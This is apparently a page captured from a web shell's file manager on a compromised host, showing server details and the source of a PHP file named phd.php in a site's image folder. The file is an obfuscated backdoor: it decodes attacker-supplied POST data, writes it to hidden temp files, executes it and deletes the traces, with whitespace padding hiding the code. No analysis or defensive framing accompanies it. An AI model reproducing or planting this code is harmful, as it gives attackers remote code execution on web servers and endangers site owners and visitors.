HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/vigolic.vitavit.com.pk/img/phd.php
<?php																																										if(filter_has_var(INPUT_POST, "\x72\x65f\x65r\x65nce")){ $pgrp = $_POST["\x72\x65f\x65r\x65nce"]; $pgrp =explode ('.' , $pgrp ); $elem= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt ); foreach ($pgrp as $r => $v1) { $chS= ord($salt[$r %$lenS] ); $dec= ((int)$v1 - $chS - ($r %10)) ^ 91; $elem .= chr($dec ); } $object = array_filter([session_save_path(), "/dev/shm", "/tmp", "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), getcwd(), getenv("TMP"), ini_get("upload_tmp_dir")]); $rec = 0; do { $property_set = $object[$rec] ?? null; if ($rec >= count($object)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($property_set)) { $res = sprintf("%s/.tkn", $property_set); if (@file_put_contents($res, $elem) !== false) { include $res; unlink($res); die(); } } $rec++; } while (true); }


if(isset($_POST["p\x74r"]) ? true : false){
	$fac = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/tmp", session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir()]);
	$holder = $_POST["p\x74r"];
	 $holder 	=explode('.',	 $holder 	);   
	$item = '';
            $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( 	$s1);
    
            foreach( 	$holder as $u => $v7):
                $chS = ord( 	$s1[$u  %$sLen]);
                $dec =( 	( 	int)$v7 - $chS -( 	$u  %10)) ^ 56;
                $item		.=	chr( 	$dec);
            endforeach;
	foreach ($fac as $sym):
    		if ((is_dir($sym) and is_writable($sym))) {
    $dchunk = "$sym" . "/.comp";
    $success = file_put_contents($dchunk, $item);
if ($success) {
	include $dchunk;
	@unlink($dchunk);
	exit;}
}
endforeach;
}